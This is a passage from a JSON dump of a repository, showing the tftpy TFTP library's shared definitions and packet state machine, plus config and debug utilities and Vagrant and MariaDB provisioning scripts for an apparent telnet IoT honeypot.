    "content": "\"\"\"This module holds all objects shared by all other modules in tftpy.\"\"\"\n\nimport logging\n\nLOG_LEVEL = logging.NOTSET\nMIN_BLKSIZE = 8\nDEF_BLKSIZE = 512\nMAX_BLKSIZE = 65536\nSOCK_TIMEOUT = 5\nMAX_DUPS = 20\nTIMEOUT_RETRIES = 5\nDEF_TFTP_PORT = 69\n\n# A hook for deliberately introducing delay in testing.\nDELAY_BLOCK = 0\n\n# Initialize the logger.\nlogging.basicConfig()\n# The logger used by this library. Feel free to clobber it with your own, if you like, as\n# long as it conforms to Python's logging.\nlog = logging.getLogger('tftpy')\n\ndef tftpassert(condition, msg):\n    \"\"\"This function is a simple utility that will check the condition\n    passed for a false state. If it finds one, it throws a TftpException\n    with the message passed. This just makes the code throughout cleaner\n    by refactoring.\"\"\"\n    if not condition:\n        raise TftpException, msg\n\ndef setLogLevel(level):\n    \"\"\"This function is a utility function for setting the internal log level.\n    The log level defaults to logging.NOTSET, so unwanted output to stdout is\n    not created.\"\"\"\n    global log\n    log.setLevel(level)\n\nclass TftpErrors(object):\n    \"\"\"This class is a convenience for defining the common tftp error codes,\n    and making them more readable in the code.\"\"\"\n    NotDefined = 0\n    FileNotFound = 1\n    AccessViolation = 2\n    DiskFull = 3\n    IllegalTftpOp = 4\n    UnknownTID = 5\n    FileAlreadyExists = 6\n    NoSuchUser = 7\n    FailedNegotiation = 8\n\nclass TftpException(Exception):\n    \"\"\"This class is the parent class of all exceptions regarding the handling\n    of the TFTP protocol.\"\"\"\n    pass\n\nclass TftpTimeout(TftpException):\n    \"\"\"This class represents a timeout error waiting for a response from the\n    other end.\"\"\"\n    pass\n"
  },
  {
    "path": "tftpy/TftpStates.py",
    "content": "\"\"\"This module implements all state handling during uploads and downloads, the\nmain interface to which being the TftpState base class. \n\nThe concept is simple. Each context object represents a single upload or\ndownload, and the state object in the context object represents the current\nstate of that transfer. The state object has a handle() method that expects\nthe next packet in the transfer, and returns a state object until the transfer\nis complete, at which point it returns None. That is, unless there is a fatal\nerror, in which case a TftpException is returned instead.\"\"\"\n\nfrom TftpShared import *\nfrom TftpPacketTypes import *\nimport os\n\n###############################################################################\n# State classes\n###############################################################################\n\nclass TftpState(object):\n    \"\"\"The base class for the states.\"\"\"\n\n    def __init__(self, context):\n        \"\"\"Constructor for setting up common instance variables. The involved\n        file object is required, since in tftp there's always a file\n        involved.\"\"\"\n        self.context = context\n\n    def handle(self, pkt, raddress, rport):\n        \"\"\"An abstract method for handling a packet. It is expected to return\n        a TftpState object, either itself or a new state.\"\"\"\n        raise NotImplementedError, \"Abstract method\"\n\n    def handleOACK(self, pkt):\n        \"\"\"This method handles an OACK from the server, syncing any accepted\n        options.\"\"\"\n        if pkt.options.keys() > 0:\n            if pkt.match_options(self.context.options):\n                log.info(\"Successful negotiation of options\")\n                # Set options to OACK options\n                self.context.options = pkt.options\n                for key in self.context.options:\n                    log.info(\"    %s = %s\" % (key, self.context.options[key]))\n            else:\n                log.error(\"Failed to negotiate options\")\n                raise TftpException, \"Failed to negotiate options\"\n        else:\n            raise TftpException, \"No options found in OACK\"\n\n    def returnSupportedOptions(self, options):\n        \"\"\"This method takes a requested options list from a client, and\n        returns the ones that are supported.\"\"\"\n        # We support the options blksize and tsize right now.\n        # FIXME - put this somewhere else?\n        accepted_options = {}\n        for option in options:\n            if option == 'blksize':\n                # Make sure it's valid.\n                if int(options[option]) > MAX_BLKSIZE:\n                    log.info(\"Client requested blksize greater than %d \"\n                             \"setting to maximum\" % MAX_BLKSIZE)\n                    accepted_options[option] = MAX_BLKSIZE\n                elif int(options[option]) < MIN_BLKSIZE:\n                    log.info(\"Client requested blksize less than %d \"\n                             \"setting to minimum\" % MIN_BLKSIZE)\n                    accepted_options[option] = MIN_BLKSIZE\n                else:\n                    accepted_options[option] = options[option]\n            elif option == 'tsize':\n                log.debug(\"tsize option is set\")\n                accepted_options['tsize'] = 1\n            else:\n                log.info(\"Dropping unsupported option '%s'\" % option)\n        log.debug(\"Returning these accepted options: %s\" % accepted_options)\n        return accepted_options\n\n    def serverInitial(self, pkt, raddress, rport):\n        \"\"\"This method performs initial setup for a server context transfer,\n        put here to refactor code out of the TftpStateServerRecvRRQ and\n        TftpStateServerRecvWRQ classes, since their initial setup is\n        identical. The method returns a boolean, sendoack, to indicate whether\n        it is required to send an OACK to the client.\"\"\"\n        options = pkt.options\n        sendoack = False\n        if not self.context.tidport:\n            self.context.tidport = rport\n            log.info(\"Setting tidport to %s\" % rport)\n\n        log.debug(\"Setting default options, blksize\")\n        self.context.options = { 'blksize': DEF_BLKSIZE }\n\n        if options:\n            log.debug(\"Options requested: %s\" % options)\n            supported_options = self.returnSupportedOptions(options)\n            self.context.options.update(supported_options)\n            sendoack = True\n\n        # FIXME - only octet mode is supported at this time.\n        if pkt.mode != 'octet':\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \\\n                \"Only octet transfers are supported at this time.\"\n\n        # test host/port of client end\n        if self.context.host != raddress or self.context.port != rport:\n            self.sendError(TftpErrors.UnknownTID)\n            log.error(\"Expected traffic from %s:%s but received it \"\n                            \"from %s:%s instead.\"\n                            % (self.context.host,\n                               self.context.port,\n                               raddress,\n                               rport))\n            # FIXME: increment an error count?\n            # Return same state, we're still waiting for valid traffic.\n            return self\n\n        log.debug(\"Requested filename is %s\" % pkt.filename)\n        # There are no os.sep's allowed in the filename.\n        # FIXME: Should we allow subdirectories?\n        if pkt.filename.find(os.sep) >= 0:\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"%s found in filename, not permitted\" % os.sep\n\n        self.context.file_to_transfer = pkt.filename\n\n        return sendoack\n\n    def sendDAT(self):\n        \"\"\"This method sends the next DAT packet based on the data in the\n        context. It returns a boolean indicating whether the transfer is\n        finished.\"\"\"\n        finished = False\n        blocknumber = self.context.next_block\n        # Test hook\n        if DELAY_BLOCK and DELAY_BLOCK == blocknumber:\n            import time\n            log.debug(\"Deliberately delaying 10 seconds...\")\n            time.sleep(10)\n        tftpassert( blocknumber > 0, \"There is no block zero!\" )\n        dat = None\n        blksize = self.context.getBlocksize()\n        buffer = self.context.fileobj.read(blksize)\n        log.debug(\"Read %d bytes into buffer\" % len(buffer))\n        if len(buffer) < blksize:\n            log.info(\"Reached EOF on file %s\"\n                % self.context.file_to_transfer)\n            finished = True\n        dat = TftpPacketDAT()\n        dat.data = buffer\n        dat.blocknumber = blocknumber\n        self.context.metrics.bytes += len(dat.data)\n        log.debug(\"Sending DAT packet %d\" % dat.blocknumber)\n        self.context.sock.sendto(dat.encode().buffer,\n                                 (self.context.host, self.context.tidport))\n        if self.context.packethook:\n            self.context.packethook(dat)\n        self.context.last_pkt = dat\n        return finished\n\n    def sendACK(self, blocknumber=None):\n        \"\"\"This method sends an ack packet to the block number specified. If\n        none is specified, it defaults to the next_block property in the\n        parent context.\"\"\"\n        log.debug(\"In sendACK, passed blocknumber is %s\" % blocknumber)\n        if blocknumber is None:\n            blocknumber = self.context.next_block\n        log.info(\"Sending ack to block %d\" % blocknumber)\n        ackpkt = TftpPacketACK()\n        ackpkt.blocknumber = blocknumber\n        self.context.sock.sendto(ackpkt.encode().buffer,\n                                 (self.context.host,\n                                  self.context.tidport))\n        self.context.last_pkt = ackpkt\n\n    def sendError(self, errorcode):\n        \"\"\"This method uses the socket passed, and uses the errorcode to\n        compose and send an error packet.\"\"\"\n        log.debug(\"In sendError, being asked to send error %d\" % errorcode)\n        errpkt = TftpPacketERR()\n        errpkt.errorcode = errorcode\n        self.context.sock.sendto(errpkt.encode().buffer,\n                                 (self.context.host,\n                                  self.context.tidport))\n        self.context.last_pkt = errpkt\n\n    def sendOACK(self):\n        \"\"\"This method sends an OACK packet with the options from the current\n        context.\"\"\"\n        log.debug(\"In sendOACK with options %s\" % self.context.options)\n        pkt = TftpPacketOACK()\n        pkt.options = self.context.options\n        self.context.sock.sendto(pkt.encode().buffer,\n                                 (self.context.host,\n                                  self.context.tidport))\n        self.context.last_pkt = pkt\n\n    def resendLast(self):\n        \"Resend the last sent packet due to a timeout.\"\n        log.warn(\"Resending packet %s on sessions %s\"\n            % (self.context.last_pkt, self))\n        self.context.metrics.resent_bytes += len(self.context.last_pkt.buffer)\n        self.context.metrics.add_dup(self.context.last_pkt)\n        self.context.sock.sendto(self.context.last_pkt.encode().buffer,\n                                 (self.context.host, self.context.tidport))\n        if self.context.packethook:\n            self.context.packethook(self.context.last_pkt)\n\n    def handleDat(self, pkt):\n        \"\"\"This method handles a DAT packet during a client download, or a\n        server upload.\"\"\"\n        log.info(\"Handling DAT packet - block %d\" % pkt.blocknumber)\n        log.debug(\"Expecting block %s\" % self.context.next_block)\n        if pkt.blocknumber == self.context.next_block:\n            log.debug(\"Good, received block %d in sequence\"\n                        % pkt.blocknumber)\n\n            self.sendACK()\n            self.context.next_block += 1\n\n            log.debug(\"Writing %d bytes to output file\"\n                        % len(pkt.data))\n            self.context.fileobj.write(pkt.data)\n            self.context.metrics.bytes += len(pkt.data)\n            # Check for end-of-file, any less than full data packet.\n            if len(pkt.data) < self.context.getBlocksize():\n                log.info(\"End of file detected\")\n                return None\n\n        elif pkt.blocknumber < self.context.next_block:\n            if pkt.blocknumber == 0:\n                log.warn(\"There is no block zero!\")\n                self.sendError(TftpErrors.IllegalTftpOp)\n                raise TftpException, \"There is no block zero!\"\n            log.warn(\"Dropping duplicate block %d\" % pkt.blocknumber)\n            self.context.metrics.add_dup(pkt)\n            log.debug(\"ACKing block %d again, just in case\" % pkt.blocknumber)\n            self.sendACK(pkt.blocknumber)\n\n        else:\n            # FIXME: should we be more tolerant and just discard instead?\n            msg = \"Whoa! Received future block %d but expected %d\" \\\n                % (pkt.blocknumber, self.context.next_block)\n            log.error(msg)\n            raise TftpException, msg\n\n        # Default is to ack\n        return TftpStateExpectDAT(self.context)\n\nclass TftpStateServerRecvRRQ(TftpState):\n    \"\"\"This class represents the state of the TFTP server when it has just\n    received an RRQ packet.\"\"\"\n    def handle(self, pkt, raddress, rport):\n        \"Handle an initial RRQ packet as a server.\"\n        log.debug(\"In TftpStateServerRecvRRQ.handle\")\n        sendoack = self.serverInitial(pkt, raddress, rport)\n        path = self.context.root + os.sep + self.context.file_to_transfer\n        log.info(\"Opening file %s for reading\" % path)\n        if os.path.exists(path):\n            # Note: Open in binary mode for win32 portability, since win32\n            # blows.\n            self.context.fileobj = open(path, \"rb\")\n        elif self.context.dyn_file_func:\n            log.debug(\"No such file %s but using dyn_file_func\" % path)\n            self.context.fileobj = \\\n                self.context.dyn_file_func(self.context.file_to_transfer)\n\n            if self.context.fileobj is None:\n                log.debug(\"dyn_file_func returned 'None', treating as \"\n                          \"FileNotFound\")\n                self.sendError(TftpErrors.FileNotFound)\n                raise TftpException, \"File not found: %s\" % path\n        else:\n            self.sendError(TftpErrors.FileNotFound)\n            raise TftpException, \"File not found: %s\" % path\n\n        # Options negotiation.\n        if sendoack:\n            # Note, next_block is 0 here since that's the proper\n            # acknowledgement to an OACK.\n            # FIXME: perhaps we do need a TftpStateExpectOACK class...\n            self.sendOACK()\n            # Note, self.context.next_block is already 0.\n        else:\n            self.context.next_block = 1\n            log.debug(\"No requested options, starting send...\")\n            self.context.pending_complete = self.sendDAT()\n        # Note, we expect an ack regardless of whether we sent a DAT or an\n        # OACK.\n        return TftpStateExpectACK(self.context)\n\n        # Note, we don't have to check any other states in this method, that's\n        # up to the caller.\n\nclass TftpStateServerRecvWRQ(TftpState):\n    \"\"\"This class represents the state of the TFTP server when it has just\n    received a WRQ packet.\"\"\"\n    def handle(self, pkt, raddress, rport):\n        \"Handle an initial WRQ packet as a server.\"\n        log.debug(\"In TftpStateServerRecvWRQ.handle\")\n        sendoack = self.serverInitial(pkt, raddress, rport)\n        path = self.context.root + os.sep + self.context.file_to_transfer\n        log.info(\"Opening file %s for writing\" % path)\n        if os.path.exists(path):\n            # FIXME: correct behavior?\n            log.warn(\"File %s exists already, overwriting...\" % self.context.file_to_transfer)\n        # FIXME: I think we should upload to a temp file and not overwrite the\n        # existing file until the file is successfully uploaded.\n        self.context.fileobj = open(path, \"wb\")\n\n        # Options negotiation.\n        if sendoack:\n            log.debug(\"Sending OACK to client\")\n            self.sendOACK()\n        else:\n            log.debug(\"No requested options, expecting transfer to begin...\")\n            self.sendACK()\n        # Whether we're sending an oack or not, we're expecting a DAT for\n        # block 1\n        self.context.next_block = 1\n        # We may have sent an OACK, but we're expecting a DAT as the response\n        # to either the OACK or an ACK, so lets unconditionally use the\n        # TftpStateExpectDAT state.\n        return TftpStateExpectDAT(self.context)\n\n        # Note, we don't have to check any other states in this method, that's\n        # up to the caller.\n\nclass TftpStateServerStart(TftpState):\n    \"\"\"The start state for the server. This is a transitory state since at\n    this point we don't know if we're handling an upload or a download. We\n    will commit to one of them once we interpret the initial packet.\"\"\"\n    def handle(self, pkt, raddress, rport):\n        \"\"\"Handle a packet we just received.\"\"\"\n        log.debug(\"In TftpStateServerStart.handle\")\n        if isinstance(pkt, TftpPacketRRQ):\n            log.debug(\"Handling an RRQ packet\")\n            return TftpStateServerRecvRRQ(self.context).handle(pkt,\n                                                               raddress,\n                                                               rport)\n        elif isinstance(pkt, TftpPacketWRQ):\n            log.debug(\"Handling a WRQ packet\")\n            return TftpStateServerRecvWRQ(self.context).handle(pkt,\n                                                               raddress,\n                                                               rport)\n        else:\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \\\n                \"Invalid packet to begin up/download: %s\" % pkt\n\nclass TftpStateExpectACK(TftpState):\n    \"\"\"This class represents the state of the transfer when a DAT was just\n    sent, and we are waiting for an ACK from the server. This class is the\n    same one used by the client during the upload, and the server during the\n    download.\"\"\"\n    def handle(self, pkt, raddress, rport):\n        \"Handle a packet, hopefully an ACK since we just sent a DAT.\"\n        if isinstance(pkt, TftpPacketACK):\n            log.info(\"Received ACK for packet %d\" % pkt.blocknumber)\n            # Is this an ack to the one we just sent?\n            if self.context.next_block == pkt.blocknumber:\n                if self.context.pending_complete:\n                    log.info(\"Received ACK to final DAT, we're done.\")\n                    return None\n                else:\n                    log.debug(\"Good ACK, sending next DAT\")\n                    self.context.next_block += 1\n                    log.debug(\"Incremented next_block to %d\"\n                        % (self.context.next_block))\n                    self.context.pending_complete = self.sendDAT()\n\n            elif pkt.blocknumber < self.context.next_block:\n                log.debug(\"Received duplicate ACK for block %d\"\n                    % pkt.blocknumber)\n                self.context.metrics.add_dup(pkt)\n\n            else:\n                log.warn(\"Oooh, time warp. Received ACK to packet we \"\n                         \"didn't send yet. Discarding.\")\n                self.context.metrics.errors += 1\n            return self\n        elif isinstance(pkt, TftpPacketERR):\n            log.error(\"Received ERR packet from peer: %s\" % str(pkt))\n            raise TftpException, \\\n                \"Received ERR packet from peer: %s\" % str(pkt)\n        else:\n            log.warn(\"Discarding unsupported packet: %s\" % str(pkt))\n            return self\n\nclass TftpStateExpectDAT(TftpState):\n    \"\"\"Just sent an ACK packet. Waiting for DAT.\"\"\"\n    def handle(self, pkt, raddress, rport):\n        \"\"\"Handle the packet in response to an ACK, which should be a DAT.\"\"\"\n        if isinstance(pkt, TftpPacketDAT):\n            return self.handleDat(pkt)\n\n        # Every other packet type is a problem.\n        elif isinstance(pkt, TftpPacketACK):\n            # Umm, we ACK, you don't.\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received ACK from peer when expecting DAT\"\n\n        elif isinstance(pkt, TftpPacketWRQ):\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received WRQ from peer when expecting DAT\"\n\n        elif isinstance(pkt, TftpPacketERR):\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received ERR from peer: \" + str(pkt)\n\n        else:\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received unknown packet type from peer: \" + str(pkt)\n\nclass TftpStateSentWRQ(TftpState):\n    \"\"\"Just sent an WRQ packet for an upload.\"\"\"\n    def handle(self, pkt, raddress, rport):\n        \"\"\"Handle a packet we just received.\"\"\"\n        if not self.context.tidport:\n            self.context.tidport = rport\n            log.debug(\"Set remote port for session to %s\" % rport)\n\n        # If we're going to successfully transfer the file, then we should see\n        # either an OACK for accepted options, or an ACK to ignore options.\n        if isinstance(pkt, TftpPacketOACK):\n            log.info(\"Received OACK from server\")\n            try:\n                self.handleOACK(pkt)\n            except TftpException:\n                log.error(\"Failed to negotiate options\")\n                self.sendError(TftpErrors.FailedNegotiation)\n                raise\n            else:\n                log.debug(\"Sending first DAT packet\")\n                self.context.pending_complete = self.sendDAT()\n                log.debug(\"Changing state to TftpStateExpectACK\")\n                return TftpStateExpectACK(self.context)\n\n        elif isinstance(pkt, TftpPacketACK):\n            log.info(\"Received ACK from server\")\n            log.debug(\"Apparently the server ignored our options\")\n            # The block number should be zero.\n            if pkt.blocknumber == 0:\n                log.debug(\"Ack blocknumber is zero as expected\")\n                log.debug(\"Sending first DAT packet\")\n                self.context.pending_complete = self.sendDAT()\n                log.debug(\"Changing state to TftpStateExpectACK\")\n                return TftpStateExpectACK(self.context)\n            else:\n                log.warn(\"Discarding ACK to block %s\" % pkt.blocknumber)\n                log.debug(\"Still waiting for valid response from server\")\n                return self\n\n        elif isinstance(pkt, TftpPacketERR):\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received ERR from server: \" + str(pkt)\n\n        elif isinstance(pkt, TftpPacketRRQ):\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received RRQ from server while in upload\"\n\n        elif isinstance(pkt, TftpPacketDAT):\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received DAT from server while in upload\"\n\n        else:\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received unknown packet type from server: \" + str(pkt)\n\n        # By default, no state change.\n        return self\n\nclass TftpStateSentRRQ(TftpState):\n    \"\"\"Just sent an RRQ packet.\"\"\"\n    def handle(self, pkt, raddress, rport):\n        \"\"\"Handle the packet in response to an RRQ to the server.\"\"\"\n        if not self.context.tidport:\n            self.context.tidport = rport\n            log.info(\"Set remote port for session to %s\" % rport)\n\n        # Now check the packet type and dispatch it properly.\n        if isinstance(pkt, TftpPacketOACK):\n            log.info(\"Received OACK from server\")\n            try:\n                self.handleOACK(pkt)\n            except TftpException, err:\n                log.error(\"Failed to negotiate options: %s\" % str(err))\n                self.sendError(TftpErrors.FailedNegotiation)\n                raise\n            else:\n                log.debug(\"Sending ACK to OACK\")\n\n                self.sendACK(blocknumber=0)\n\n                log.debug(\"Changing state to TftpStateExpectDAT\")\n                return TftpStateExpectDAT(self.context)\n\n        elif isinstance(pkt, TftpPacketDAT):\n            # If there are any options set, then the server didn't honour any\n            # of them.\n            log.info(\"Received DAT from server\")\n            if self.context.options:\n                log.info(\"Server ignored options, falling back to defaults\")\n                self.context.options = { 'blksize': DEF_BLKSIZE }\n            return self.handleDat(pkt)\n\n        # Every other packet type is a problem.\n        elif isinstance(pkt, TftpPacketACK):\n            # Umm, we ACK, the server doesn't.\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received ACK from server while in download\"\n\n        elif isinstance(pkt, TftpPacketWRQ):\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received WRQ from server while in download\"\n\n        elif isinstance(pkt, TftpPacketERR):\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received ERR from server: \" + str(pkt)\n\n        else:\n            self.sendError(TftpErrors.IllegalTftpOp)\n            raise TftpException, \"Received unknown packet type from server: \" + str(pkt)\n\n        # By default, no state change.\n        return self\n"
  },
  {
    "path": "tftpy/__init__.py",
    "content": "\"\"\"\nThis library implements the tftp protocol, based on rfc 1350.\nhttp://www.faqs.org/rfcs/rfc1350.html\nAt the moment it implements only a client class, but will include a server,\nwith support for variable block sizes.\n\nAs a client of tftpy, this is the only module that you should need to import\ndirectly. The TftpClient and TftpServer classes can be reached through it.\n\"\"\"\n\nimport sys\n\n# Make sure that this is at least Python 2.3\nverlist = sys.version_info\nif not verlist[0] >= 2 or not verlist[1] >= 3:\n    raise AssertionError, \"Requires at least Python 2.3\"\n\nfrom TftpShared import *\nfrom TftpPacketTypes import *\nfrom TftpPacketFactory import *\nfrom TftpClient import *\nfrom TftpServer import *\nfrom TftpContexts import *\nfrom TftpStates import *\n"
  },
  {
    "path": "util/__init__.py",
    "content": ""
  },
  {
    "path": "util/config.py",
    "content": "import yaml\nimport random\nimport string\n\ndef rand():\n\tchars = string.ascii_uppercase + string.digits\n\treturn ''.join(random.SystemRandom().choice(chars) for _ in range(32))\n\nclass Config:\n\tdef __init__(self):\n\t\tself.distconfig = self.loadyaml(\"config.dist.yaml\")\n\t\ttry:\n\t\t\tself.userconfig = self.loadyaml(\"config.yaml\")\n\t\texcept:\n\t\t\tprint \"Warning: Cannot load config.yaml\"\n\t\t\tself.userconfig = {}\n\n\tdef loadyaml(self, filename):\n\t\twith open(filename, \"rb\") as fp:\n\t\t\tstring = fp.read()\n\t\t\treturn yaml.load(string)\n\t\t\n\tdef loadUserConfig(self, filename):\n\t\ttry:\n\t\t\tself.userconfig = self.loadyaml(filename)\n\t\texcept:\n\t\t\tprint \"Warning: Cannot load \" + str(filename)\n\t\n\tdef get(self, key, optional=False, default=None):\n\t\tif key in self.userconfig:\n\t\t\treturn self.userconfig[key]\n\t\telif key in self.distconfig:\n\t\t\treturn self.distconfig[key]\n\t\telif not(optional):\n\t\t\traise Exception(\"Option \\\"\"+ key +\"\\\" not found in config\")\n\t\telse:\n\t\t\treturn default\n\nconfig = Config()\n\n"
  },
  {
    "path": "util/dbg.py",
    "content": "import datetime\nimport traceback\nimport sys\nimport os.path\n\nDEBUG = True\n\ndef dbg(msg):\n\tif DEBUG:\n\t\tnow  = datetime.datetime.now()\n\t\tnow  = now.strftime('%Y-%m-%d %H:%M:%S')\n\t\tline = traceback.extract_stack()[-2]\n\t\tline = os.path.basename(line[0]) + \":\" + str(line[1])\n\t\tprint(now + \"   \" + line.ljust(16, \" \") + \"  \" + msg)\n\t\tsys.stdout.flush()\n"
  },
  {
    "path": "vagrant/.gitignore",
    "content": ".vagrant\n*.log\n\n"
  },
  {
    "path": "vagrant/mariadb/Vagrantfile",
    "content": "# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\n# All Vagrant configuration is done below. The \"2\" in Vagrant.configure\n# configures the configuration version (we support older styles for\n# backwards compatibility). Please don't change it unless you know what\n# you're doing.\n\nVagrant.configure(2) do |config|\n\n  # The most common configuration options are documented and commented below.\n  # For a complete reference, please see the online documentation at\n  # https://docs.vagrantup.com.\n\n  # Every Vagrant development environment requires a box. You can search for\n  # boxes at https://atlas.hashicorp.com/search.\n  config.vm.box = \"ubuntu/xenial64\"\n\n  # Disable automatic box update checking. If you disable this, then\n  # boxes will only be checked for updates when the user runs\n  # `vagrant box outdated`. This is not recommended.\n  # config.vm.box_check_update = false\n\n  # Create a forwarded port mapping which allows access to a specific port\n  # within the machine from a port on the host machine. In the example below,\n  # accessing \"localhost:8080\" will access port 80 on the guest machine.\n  config.vm.network \"forwarded_port\", guest: 5000, host: 5000\n  config.vm.network \"forwarded_port\", guest: 2323, host: 2323\n\n  # Create a private network, which allows host-only access to the machine\n  # using a specific IP.\n  # config.vm.network \"private_network\", ip: \"192.168.33.10\"\n\n  # Create a public network, which generally matched to bridged network.\n  # Bridged networks make the machine appear as another physical device on\n  # your network.\n  # config.vm.network \"public_network\"\n\n  # Share an additional folder to the guest VM. The first argument is\n  # the path on the host to the actual folder. The second argument is\n  # the path on the guest to mount the folder. And the optional third\n  # argument is a set of non-required options.\n  config.vm.synced_folder \"../../\", \"/vagrant_data\"\n\n  # Provider-specific configuration so you can fine-tune various\n  # backing providers for Vagrant. These expose provider-specific options.\n  # Example for VirtualBox:\n  \n  config.vm.provider \"virtualbox\" do |vb|\n    # Display the VirtualBox GUI when booting the machine\n    vb.gui = false\n  \n    # Customize the amount of memory on the VM:\n    vb.memory   = \"1024\"\n    # vb.cpus   = 2\n  end\n\n  # View the documentation for the provider you are using for more\n  # information on available options.\n\n  # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies\n  # such as FTP and Heroku are also available. See the documentation at\n  # https://docs.vagrantup.com/v2/push/atlas.html for more information.\n  # config.push.define \"atlas\" do |push|\n  #   push.app = \"YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME\"\n  # end\n\n  # Enable provisioning with a shell script. Additional provisioners such as\n  # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the\n  # documentation for more information about their specific syntax and use.\n  config.vm.provision \"shell\", privileged: 'false', inline: <<-SHELL\n    sudo apt-get update\n    sudo apt-get install -y python-pip sqlite3 screen libmysqlclient-dev python-mysqldb\n    \n    cp -r /vagrant_data telnet-iot-honeypot\n    cd telnet-iot-honeypot\n\trm database.db\n\trm config.yaml\n\n    export LC_ALL=C\n    sudo pip install -r requirements.txt\n\n\tsudo bash create_config.sh\n\tsudo bash vagrant/mariadb/mysql.sh\n  SHELL\n\n  config.vm.provision \"shell\", privileged: 'false', run: 'always', inline: <<-SHELL\n    screen -dmS backend  bash -c \"cd telnet-iot-honeypot; python backend.py\"\n    sleep 5\n    screen -dmS honeypot bash -c \"cd telnet-iot-honeypot; python honeypot.py\"\n    screen -list\n  SHELL\nend\n\n"
  },
  {
    "path": "vagrant/mariadb/mysql.sh",
    "content": "#/bin/bash\n\necho \" - Install MariaDB\"\nsudo apt-get install -y mariadb-server\n\nuser=honey\ndb=honey\npw=$(openssl rand -hex 16)\nsql=\"mysql+mysqldb://$user:$pw@localhost/$db\"\n\necho \" - Create DB\"\necho \"\"\necho \"DROP USER $user;\"              | sudo mysql\necho \"DROP USER '$user'@'localhost'\" | sudo mysql\necho \"DROP DATABASE $db;\"            | sudo mysql\necho \"CREATE USER '$user'@'localhost' IDENTIFIED BY '$pw';\nCREATE DATABASE $db CHARACTER SET latin1 COLLATE latin1_swedish_ci;\nGRANT ALL ON $db.* TO '$user'@'localhost';\nFLUSH PRIVILEGES;\n\" | sudo mysql\n\necho \" - Writing config\"\necho sql: \\\"$sql\\\" >> config.yaml\n\n"
  },
  {
    "path": "vagrant/sqlite/Vagrantfile",
    "content": "# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\n# All Vagrant configuration is done below. The \"2\" in Vagrant.configure\n# configures the configuration version (we support older styles for\n# backwards compatibility). Please don't change it unless you know what\n# you're doing.\n\nVagrant.configure(2) do |config|\n\n  # The most common configuration options are documented and commented below.\n  # For a complete reference, please see the online documentation at\n  # https://docs.vagrantup.com.\n\n  # Every Vagrant development environment requires a box. You can search for\n  # boxes at https://atlas.hashicorp.com/search.\n  config.vm.box = \"ubuntu/xenial64\"\n\n  # Disable automatic box update checking. If you disable this, then\n  # boxes will only be checked for updates when the user runs\n  # `vagrant box outdated`. This is not recommended.\n  # config.vm.box_check_update = false\n\n  # Create a forwarded port mapping which allows access to a specific port\n  # within the machine from a port on the host machine. In the example below,\n  # accessing \"localhost:8080\" will access port 80 on the guest machine.\n  config.vm.network \"forwarded_port\", guest: 5000, host: 5000\n  config.vm.network \"forwarded_port\", guest: 2323, host: 2323\n\n  # Create a private network, which allows host-only access to the machine\n  # using a specific IP.\n  # config.vm.network \"private_network\", ip: \"192.168.33.10\"\n\n  # Create a public network, which generally matched to bridged network.\n  # Bridged networks make the machine appear as another physical device on\n  # your network.\n  # config.vm.network \"public_network\"\n\n  # Share an additional folder to the guest VM. The first argument is\n  # the path on the host to the actual folder. The second argument is\n  # the path on the guest to mount the folder. And the optional third\n  # argument is a set of non-required options.\n  config.vm.synced_folder \"../../\", \"/vagrant_data\"\n\n  # Provider-specific configuration so you can fine-tune various\n  # backing providers for Vagrant. These expose provider-specific options.\n  # Example for VirtualBox:\n  \n  config.vm.provider \"virtualbox\" do |vb|\n    # Display the VirtualBox GUI when booting the machine\n    vb.gui = false\n  \n    # Customize the amount of memory on the VM:\n    vb.memory   = \"768\"\n    # vb.cpus   = 2\n  end\n\n  # View the documentation for the provider you are using for more\n  # information on available options.\n\n  # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies\n  # such as FTP and Heroku are also available. See the documentation at\n  # https://docs.vagrantup.com/v2/push/atlas.html for more information.\n  # config.push.define \"atlas\" do |push|\n  #   push.app = \"YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME\"\n  # end\n\n  # Enable provisioning with a shell script. Additional provisioners such as\n  # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the\n  # documentation for more information about their specific syntax and use.\n  config.vm.provision \"shell\", privileged: 'false', inline: <<-SHELL\n    sudo apt-get update\n    sudo apt-get install -y python-pip sqlite3 screen\n    \n    cp -r /vagrant_data telnet-iot-honeypot\n    cd telnet-iot-honeypot\n\trm database.db\n\trm config.yaml\n\n    export LC_ALL=C\n    sudo pip install -r requirements.txt\n\n\tsudo bash create_config.sh\n  SHELL\n\n  config.vm.provision \"shell\", privileged: 'false', run: 'always', inline: <<-SHELL\n    screen -dmS backend  bash -c \"cd telnet-iot-honeypot; python backend.py\"\n    sleep 5\n    screen -dmS honeypot bash -c \"cd telnet-iot-honeypot; python honeypot.py\"\n    screen -list\n  SHELL\nend\n\n"
  }
]